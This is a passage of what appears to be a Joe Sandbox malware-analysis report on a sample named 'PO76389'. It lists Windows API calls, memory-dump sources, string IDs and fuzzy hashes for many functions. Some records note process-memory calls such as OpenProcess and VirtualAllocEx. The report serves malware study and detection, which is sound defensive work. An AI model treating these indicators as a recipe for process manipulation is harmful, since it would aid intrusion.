                                                      • Part of subcall function 004F4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 004F4CA0
                                                      • Part of subcall function 004F4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 004F4CB6
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004ED036
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004ED083
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: f7f813f49b3fc29fff1086f5ec1559d929bb18d224f0dd3742adadd084179e12
                                                    • Instruction ID: 21aceaac69b9941f7e9ae911cac0bd378385d363bbc86f19bd88793450072967
                                                    • Opcode Fuzzy Hash: f7f813f49b3fc29fff1086f5ec1559d929bb18d224f0dd3742adadd084179e12
                                                    • Instruction Fuzzy Hash: 4C416C7290021CAEDB10DFA4CC81AEFB7B8EF49704F04409AEA55B7291CA746E45CB64
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0054DBF0,00000000,?,?,?,?), ref: 0051A4E6
                                                    • GetWindowLongW.USER32 ref: 0051A503
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0051A513
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: 056392505b7f366a77666a4481cf3f022a4604bd9dc0c363881967c102564564
                                                    • Instruction ID: 27394786b2b722c8c60533547c54da31972d99baffdef47e4786097636d27321
                                                    • Opcode Fuzzy Hash: 056392505b7f366a77666a4481cf3f022a4604bd9dc0c363881967c102564564
                                                    • Instruction Fuzzy Hash: C331D235201605AFEF129E38CC45BE67BA9FB49338F214719F875932E0C774E8A0AB51
                                                    APIs
                                                    • _memset.LIBCMT ref: 005057E7
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0050581D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: ?KP$|
                                                    • API String ID: 1413715105-1839330679
                                                    • Opcode ID: b33c152de6e1ea51c37a6d843b7f8feecd552215c2056828e084a4c2d3fb8537
                                                    • Instruction ID: 9ecf2896b58f868fd4650635d82d6107214ce82dfadcaf73d88e16abec920632
                                                    • Opcode Fuzzy Hash: b33c152de6e1ea51c37a6d843b7f8feecd552215c2056828e084a4c2d3fb8537
                                                    • Instruction Fuzzy Hash: 35311871C00119EBCF11AFA1CC95AEFBFB9FF18344F10801AF815A6162EA359A06DB64
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0051A74F
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0051A75D
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0051A764
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: f81144b328c2668f7bd158f081551aa9653f6194556104f9cd5b898212b847e4
                                                    • Instruction ID: 911e9b7b34e0d7ed8fbf67c59a619cf0f21ca725fb3d55e1311b2e7f5a75a767
                                                    • Opcode Fuzzy Hash: f81144b328c2668f7bd158f081551aa9653f6194556104f9cd5b898212b847e4
                                                    • Instruction Fuzzy Hash: 9921DEB5600605AFEB01DF28DCC1EA73BBCFB9A394B040009F9059B391CB70EC51DA61
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0051983D
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0051984D
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00519872
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: f9f3cd723e16b91658b251a842fe812c679b4bf33bfe5c2dd14963d435fde6eb
                                                    • Instruction ID: 09cfa4b96b5a806041b368e42733e283c6fcc279bc5a06ce721eb7596a6b7e40
                                                    • Opcode Fuzzy Hash: f9f3cd723e16b91658b251a842fe812c679b4bf33bfe5c2dd14963d435fde6eb
                                                    • Instruction Fuzzy Hash: C421D032610118BBEB118F54DC85FEB3BAAFF8A754F018128F9159B190C6719C919BA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0051A27B
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0051A290
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0051A29D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: 426db9daa25d880842e04d5e2ef77b08fa55b98b90f8021ee9fd550817430f25
                                                    • Instruction ID: 09e9c6582a8e06fc35bfdeb17629f7b8a76d5b005e0a575795a3ead637f73a39
                                                    • Opcode Fuzzy Hash: 426db9daa25d880842e04d5e2ef77b08fa55b98b90f8021ee9fd550817430f25
                                                    • Instruction Fuzzy Hash: 2211E375200208BBEF215F65CC46FE73FA8FF89B54F014118FA55A6090D272A891DB60
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 004D2F79
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004D2F80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 2574300362-340411864
                                                    • Opcode ID: 17e9319dbd09a53a9fc8eb401870e523996eee7bc4e0afa8b3a422b088c86b0c
                                                    • Instruction ID: 353955e52a824bfc9d928af7dba3d68e990f8ca3a17b44d9e8d86fb3b068c90c
                                                    • Opcode Fuzzy Hash: 17e9319dbd09a53a9fc8eb401870e523996eee7bc4e0afa8b3a422b088c86b0c
                                                    • Instruction Fuzzy Hash: 4EE0C270A94300AADA105B64FD49B167AB4A720706F401425F106E22E0DBB94098FF18
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004D2F4E), ref: 004D304E
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004D3055
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 2574300362-2819208100
                                                    • Opcode ID: b78e26925ed519c767e7ba57bf72eedff48ffa737a6d4f1f848ba4b5165cfa28
                                                    • Instruction ID: 8129a3b47c586f42c1870f28e7172eabea5d6a8613db9c3186397a59161edf67
                                                    • Opcode Fuzzy Hash: b78e26925ed519c767e7ba57bf72eedff48ffa737a6d4f1f848ba4b5165cfa28
                                                    • Instruction Fuzzy Hash: D9E092B0644200EBDB615F61BE0DB063AB8B720702F501025F10DE22F0DBF94558FA29
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: 68272c702728b758ea05e89ad08aabafaaf5b7f1261e3d3012249a38d055ae37
                                                    • Instruction ID: f62247e1100051567d4c51561461953565157a370e0e1f2835d022e2f456bf09
                                                    • Opcode Fuzzy Hash: 68272c702728b758ea05e89ad08aabafaaf5b7f1261e3d3012249a38d055ae37
                                                    • Instruction Fuzzy Hash: 40E01275C0802CEAD754C6D1AD069BA7B7CBF15300F148893BD1692080D7359B58AB22
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,005120EC,?,005122E0), ref: 00512104
                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00512116
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetProcessId$kernel32.dll
                                                    • API String ID: 2574300362-399901964
                                                    • Opcode ID: bb915afa7f9c779fdbd309b7a1b19fe424adc786b6a3fa608db24983c0bb6b93
                                                    • Instruction ID: 0a336335eadef11a33c2a2e8f5115a329c750c75418b7e9a77d014a9526752a9
                                                    • Opcode Fuzzy Hash: bb915afa7f9c779fdbd309b7a1b19fe424adc786b6a3fa608db24983c0bb6b93
                                                    • Instruction Fuzzy Hash: 98D0A7345407129FEB209F71F80D6423EF8BB24300F004429E64AD2254D770C8C0CA60
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,004CE6D9,?,004CE55B,0054DC28,?,?), ref: 004CE6F1
                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004CE703
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: IsWow64Process$kernel32.dll
                                                    • API String ID: 2574300362-3024904723
                                                    • Opcode ID: 1f28fbeb58b87b2379a67781c5f630b53712b05f0a52261c9f87084376355eb7
                                                    • Instruction ID: 5b59de5e865ea88702e34319b5654a0961a002fc642659d175537ff0bcaa036a
                                                    • Opcode Fuzzy Hash: 1f28fbeb58b87b2379a67781c5f630b53712b05f0a52261c9f87084376355eb7
                                                    • Instruction Fuzzy Hash: D3D05238A00B128BDB602BA2A848A133FF8BB14300F00442EE495D2390DBB8C880CBA0
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,004CE69C,75920AE0,004CE5AC,0054DC28,?,?), ref: 004CE6B4
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004CE6C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: 7a2c4108e49a8052d448c801c2605b4ab9467f1cc61abe9e3bea8318233fe828
                                                    • Instruction ID: d993cee80cb193692ca2146a59ecd6fa89d5361138abbd317d75594e6deb0824
                                                    • Opcode Fuzzy Hash: 7a2c4108e49a8052d448c801c2605b4ab9467f1cc61abe9e3bea8318233fe828
                                                    • Instruction Fuzzy Hash: A7D0A7386107128FD7205F32F809B133AF8BB34301F00542EE445D2360D774C880D664
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0050EBAF,?,0050EAAC), ref: 0050EBC7
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0050EBD9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: 75544a4d1643bbb67e92880326d3677e5b111faa278993105027ddf89525757a
                                                    • Instruction ID: bd38d30d58307c34e3368bb26dd4145d6cddf042c980be476891516073e267cc
                                                    • Opcode Fuzzy Hash: 75544a4d1643bbb67e92880326d3677e5b111faa278993105027ddf89525757a
                                                    • Instruction Fuzzy Hash: 39D0C7745047129FDB205F75F849A557EFCBB14715F208829F456D23A0DF70DC84DA60
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,004F135F,?,004F1440), ref: 004F1389
                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 004F139B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                    • API String ID: 2574300362-1071820185
                                                    • Opcode ID: d02f183684d7adc908fced94e90b0b9b31c23d0a50f4b07a0d2d66385b1d8df8
                                                    • Instruction ID: ebaf64f3a8d3bc1bd9e2f8e0ecf884b802d8a30726e403f9526175a7e22ae421
                                                    • Opcode Fuzzy Hash: d02f183684d7adc908fced94e90b0b9b31c23d0a50f4b07a0d2d66385b1d8df8
                                                    • Instruction Fuzzy Hash: 70D05E348003129FE7200B64E8086523AF4AF24314B05441AE985D2760D674D488E664
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,004F1371,?,004F1519), ref: 004F13B4
                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 004F13C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                    • API String ID: 2574300362-1587604923
                                                    • Opcode ID: 5c603d90bd0edb09299c8c9d7c06700f45de88748e09a64b67926b0bfbebcd66
                                                    • Instruction ID: 21081039b07df75284270e4c220529981e3a5facb7128cd629dd078d13907d02
                                                    • Opcode Fuzzy Hash: 5c603d90bd0edb09299c8c9d7c06700f45de88748e09a64b67926b0bfbebcd66
                                                    • Instruction Fuzzy Hash: BFD0A930804712DFE7240F34F8086127AF8BB50314F00442AEA95D2770DAB8C888DBA0
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00513AC2,?,00513CF7), ref: 00513ADA
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00513AEC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: 9074ecf2a4e3e2ffdc9bf36bd8929ae029da9b963117b64fc276eabeb176b999
                                                    • Instruction ID: ae7f071e3f54c44ac3638117ce29e7f4b0257583c9aa59ff3a08b8a31874e205
                                                    • Opcode Fuzzy Hash: 9074ecf2a4e3e2ffdc9bf36bd8929ae029da9b963117b64fc276eabeb176b999
